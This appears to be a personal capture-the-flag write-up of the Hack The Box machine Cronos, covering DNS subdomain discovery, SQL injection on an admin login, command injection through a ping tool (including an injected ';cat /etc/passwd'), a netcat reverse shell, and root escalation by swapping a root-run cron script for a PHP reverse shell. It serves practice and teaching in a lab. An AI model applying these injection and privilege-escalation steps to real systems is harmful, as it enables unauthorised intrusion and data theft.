# CRONOS | 10.10.10.13

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.13

### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.2p2 Ubuntu
* 53 - domain - ISC BIND 9.10.3-P4
* 80 - HTTP - Apache httpd 2.4.18

## Services Enumeration

### 22 - SSH

Standard SSH setup - we'll come back here if we find user creds.

### 53 - DNS

I have rarely seen port 53 open on Hack the Box machines, though I haven't even come close to doing them all, so what do I know? I think I'll be coming back to this one if nothing on HTTP pans out.

### 80 - HTTP

Navigating to the page results in a default Apache server page. I run a gobuster scan and I get no hits at all. I search for Apache 2.4.18 exploits and come up empty.

![](img/port-80.png)

So I think I'll go back to what having port 53 open means. Subdomains.

### Subdomains

In order for me to get anywhere, I will first need to check nslookup, which is a tool for finding nameservers. Since port 53 is open it is a good assumption there is a nameserver running.

![](img/nslookup.png)

So that confirms one is running. Then I look up how to use dig, to see if I can find any subdomains:

    dig txt cronos.htb @10.10.10.13

![](img/admin.png)

OK, that's good news. Now how do I access these pages? I need to add a couple of entries to my `/etc/hosts` file:

![](img/etc-hosts.png)

After doing that I navigate to `http://cronos.htb` and magically I arrive at a different page:

![](img/cronos-htb.png)

And now I try `http://admin.cronos.htb`:

![](img/admin-cronos.png)

I have a few options here, but I think in this situation the most likely answer is some kind of SQL injection, since there have been no hints of a possible username or a misconfiguration etc.

## Exploitation

### SQL injection

I am notoriously (to myself) terrible at memorizing even a single type of SQL injection command/attack/whatever, so I rely on the internet to help me. The [SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) section on PayloadsAllTheThings is excellent, and I tried quite a few on the list before I found one that worked.

![](img/sqli1.png)
![](img/sqli2.png)
![](img/sqli3.png)

So now I am presented with a very crude "net tool" that allows me to perform a `traceroute` or a `ping` command on any old host.

![](img/net-tool.png)

Something tells me that I should try command injection - basically adding a command at the end of either ping or traceroute to see if they execute.

![](img/id.png)

Huzzah!

### Command Injection

If I can append a command, I could run nearly anything (not everything tho - wouldn't be able to get the `/etc/shadow` file).

Adding `;cat /etc/passwd` - ![](img/etc-passwd.png)

I could maybe read the user flag, but I'm gonna go for a reverse shell first. Again, I went back to PayloadAllTheThings, and tried many reverse shell commands; the one that worked for me was [this one](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd) - your mileage may vary.

![](img/user-shell.png)

### Flag

![](img/user-flag.png)

## User Enumeration

I gotta say - the name of this box is a dead giveaway. Yes I checked `cat /etc/crontab` right away. But if you don't usually do that, then you could send over an enumeration script like linpeas, which would find it. Also pspy would work too.

![](img/crontab.png)

So what we have here is the root user running a program every minute - but it's a program and a path that our user controls. So what happens if we edit the program to add code to connect back to us, or if we replace the program entirely? A root-level reverse shell will be executed. I've opted to replace the file entirely with a php reverse shell - Kali has one available at `/usr/share/webshells/php`.

After sending it over by serving it via SimpleHTTPServer on my end, and executing `wget <ip-address>/<file>` on the victim machine, I just copy it over to the `/var/www/html/laravel` dir with the filename 'artisan'. Then I wait...

![](img/root-shell.png)

I've now owned this machine.

### Flag

![](img/root-flag.png)


## Conclusion

A pretty simple machine with an interesting way in. Incredibly, that was the first time since I started doing these machines that I have had to scan for a DNS server and edit my `/etc/hosts` file. It is a good reminder to try that the next time I seem to come up empty when I am scanning a box.

Steps taken:

* Notice port 53 open - scan for nameservers - scan for subdomains - find admin.cronos.htb
* Add relevant entries to host file to access admin page
* Exploit SQLi vuln in login page to access a web-based net tool
* Use simple command injection to call a reverse shell, gaining initial access
* Replace user-owned program that is run by root with another reverse shell, escalating to root.
